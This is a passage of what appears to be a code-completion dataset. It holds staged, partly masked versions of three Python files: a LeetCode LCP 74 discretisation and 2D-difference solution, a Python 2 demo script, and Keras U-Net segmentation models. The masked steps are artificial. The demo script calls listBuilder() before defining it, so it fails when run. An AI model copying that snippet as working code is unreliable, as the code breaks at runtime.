for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
|
normal
|
{
"blob_id": "0212382b5c8cc1e98142a784fd26efd577ebceaf",
"index": 1656,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:\n allX, allY = set(), set()\n for x, y, side in forceField:\n allX.add(2 * x - side)\n allX.add(2 * x + side)\n allY.add(2 * y - side)\n allY.add(2 * y + side)\n sortedX = sorted(allX)\n sortedY = sorted(allY)\n rankX = {x: i for i, x in enumerate(sortedX)}\n rankY = {y: i for i, y in enumerate(sortedY)}\n row, col = len(sortedX), len(sortedY)\n diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])\n for x, y, side in forceField:\n r1, c1 = rankX[2 * x - side], rankY[2 * y - side]\n r2, c2 = rankX[2 * x + side], rankY[2 * y + side]\n diffMatrix.add(r1, c1, r2, c2, 1)\n diffMatrix.update()\n res = 0\n for i in range(row):\n for j in range(col):\n res = max(res, diffMatrix.query(i, j))\n return res\n",
"step-4": "from typing import List\nfrom 二维差分模板 import DiffMatrix\n\n\nclass Solution:\n\n def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:\n allX, allY = set(), set()\n for x, y, side in forceField:\n allX.add(2 * x - side)\n allX.add(2 * x + side)\n allY.add(2 * y - side)\n allY.add(2 * y + side)\n sortedX = sorted(allX)\n sortedY = sorted(allY)\n rankX = {x: i for i, x in enumerate(sortedX)}\n rankY = {y: i for i, y in enumerate(sortedY)}\n row, col = len(sortedX), len(sortedY)\n diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])\n for x, y, side in forceField:\n r1, c1 = rankX[2 * x - side], rankY[2 * y - side]\n r2, c2 = rankX[2 * x + side], rankY[2 * y + side]\n diffMatrix.add(r1, c1, r2, c2, 1)\n diffMatrix.update()\n res = 0\n for i in range(row):\n for j in range(col):\n res = max(res, diffMatrix.query(i, j))\n return res\n",
"step-5": "# LCP 74. 最强祝福力场-离散化+二维差分\r\n# https://leetcode.cn/problems/xepqZ5/\r\n# forceField[i] = [x,y,side] 表示第 i 片力场将覆盖以坐标 (x,y) 为中心,边长为 side 的正方形区域。\r\n# !若任意一点的 力场强度 等于覆盖该点的力场数量,请求出在这片地带中 力场强度 最强处的 力场强度。\r\n\r\n# !统计所有左下和右上坐标,由于会出现 0.5可以将坐标乘 2。\r\n# O(n^2)\r\n\r\n\r\nfrom typing import List\r\nfrom 二维差分模板 import DiffMatrix\r\n\r\n\r\nclass Solution:\r\n def fieldOfGreatestBlessing(self, forceField: List[List[int]]) -> int:\r\n # 离散化\r\n allX, allY = set(), set()\r\n for x, y, side in forceField:\r\n allX.add(2 * x - side)\r\n allX.add(2 * x + side)\r\n allY.add(2 * y - side)\r\n allY.add(2 * y + side)\r\n sortedX = sorted(allX)\r\n sortedY = sorted(allY)\r\n rankX = {x: i for i, x in enumerate(sortedX)}\r\n rankY = {y: i for i, y in enumerate(sortedY)}\r\n\r\n # 二维差分\r\n row, col = len(sortedX), len(sortedY)\r\n diffMatrix = DiffMatrix([[0] * col for _ in range(row)])\r\n for x, y, side in forceField:\r\n r1, c1 = rankX[2 * x - side], rankY[2 * y - side]\r\n r2, c2 = rankX[2 * x + side], rankY[2 * y + side]\r\n diffMatrix.add(r1, c1, r2, c2, 1)\r\n\r\n diffMatrix.update()\r\n\r\n res = 0\r\n for i in range(row):\r\n for j in range(col):\r\n res = max(res, diffMatrix.query(i, j))\r\n return res\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def helloWorld():
print "We are in DEMO land!"
for i in range(10):
helloWorld()
print listBuilder()
def listBuilder():
b = []
for x in range(5):
b.append(10 * x)
return b
print "[done, for real]"
|
normal
|
{
"blob_id": "57516a17c1f3ee208076852369999d74dbb2b3ba",
"index": 98,
"step-1": "def helloWorld():\n print \"We are in DEMO land!\"\n\nfor i in range(10):\n helloWorld()\nprint listBuilder()\n\ndef listBuilder():\n b = []\n for x in range(5):\n b.append(10 * x)\n return b\n\nprint \"[done, for real]\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras import backend as keras
unet_feature_n = 512
unet_feature_nstep_size = 1e-4
unet_input_image_size = 128
def unet(pretrained_weights=None, input_size=(unet_input_image_size, unet_input_image_size, 1)):
inputs = Input(input_size)
conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)
conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)
conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)
conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)
conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)
conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(drop5))
merge6 = concatenate([drop4, up6], axis=3)
conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)
conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)
up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(conv6))
merge7 = concatenate([conv3, up7], axis=3)
conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)
conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)
up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(conv7))
merge8 = concatenate([conv2, up8], axis=3)
conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)
conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)
up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same', kernel_initializer='he_normal')(
UpSampling2D(size=(2, 2))(conv8))
merge9 = concatenate([conv1, up9], axis=3)
conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)
conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv9 = Conv2D(2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)
model = Model(inputs=inputs, outputs=conv10)
model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss='binary_crossentropy', metrics=['accuracy'])
if (pretrained_weights):
model.load_weights(pretrained_weights)
return model
def small_unet(pretrained_weights=False, patch_size=128):
input_ = Input((patch_size, patch_size, 1))
skips = []
output = input_
for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, 64, 64]):
skips.append(output)
print(output.shape)
output= Conv2D(filters, (shape, shape), strides=2, padding="same", activation="relu")(output)
#output = BatchNormalization()(output)
#if shape != 7:
# output = BatchNormalization()(output)
for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64,32, 16, 2]):
output = UpSampling2D()(output)
skip_output = skips.pop()
output = concatenate([output, skip_output], axis=3)
if filters != 2:
activation = "relu"
else:
activation = "softmax"
output = Conv2D(filters if filters != 2 else 2, (shape, shape), activation=activation, padding="same")(output)
if filters != 2:
output = BatchNormalization(momentum=.9)(output)
assert len(skips) == 0
m = Model([input_], [output])
if pretrained_weights:
m.load_weights(pretrained_weights)
m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=['accuracy'])
return m
|
normal
|
{
"blob_id": "b8d45a0028cb4e393ddca9dd6d246289328d1791",
"index": 4044,
"step-1": "<mask token>\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
"step-2": "<mask token>\n\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size,\n unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv6)\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv7)\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv8)\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n model = Model(inputs=inputs, outputs=conv10)\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss=\n 'binary_crossentropy', metrics=['accuracy'])\n if pretrained_weights:\n model.load_weights(pretrained_weights)\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
"step-3": "<mask token>\nunet_feature_n = 512\nunet_feature_nstep_size = 0.0001\nunet_input_image_size = 128\n\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size,\n unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv6)\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv7)\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv8)\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n model = Model(inputs=inputs, outputs=conv10)\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss=\n 'binary_crossentropy', metrics=['accuracy'])\n if pretrained_weights:\n model.load_weights(pretrained_weights)\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
"step-4": "from keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as keras\nunet_feature_n = 512\nunet_feature_nstep_size = 0.0001\nunet_input_image_size = 128\n\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size,\n unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv6)\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv7)\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv8)\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n model = Model(inputs=inputs, outputs=conv10)\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss=\n 'binary_crossentropy', metrics=['accuracy'])\n if pretrained_weights:\n model.load_weights(pretrained_weights)\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
"step-5": "from keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as keras\n\nunet_feature_n = 512\nunet_feature_nstep_size = 1e-4\nunet_input_image_size = 128\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size, unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)\n\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)\n\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)\n\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n\n model = Model(inputs=inputs, outputs=conv10)\n\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss='binary_crossentropy', metrics=['accuracy'])\n\n if (pretrained_weights):\n model.load_weights(pretrained_weights)\n\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, 64, 64]):\n skips.append(output)\n print(output.shape)\n output= Conv2D(filters, (shape, shape), strides=2, padding=\"same\", activation=\"relu\")(output)\n #output = BatchNormalization()(output)\n #if shape != 7:\n # output = BatchNormalization()(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64,32, 16, 2]):\n output = UpSampling2D()(output)\n\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n\n if filters != 2:\n activation = \"relu\"\n else:\n activation = \"softmax\"\n output = Conv2D(filters if filters != 2 else 2, (shape, shape), activation=activation, padding=\"same\")(output)\n \n if filters != 2:\n output = 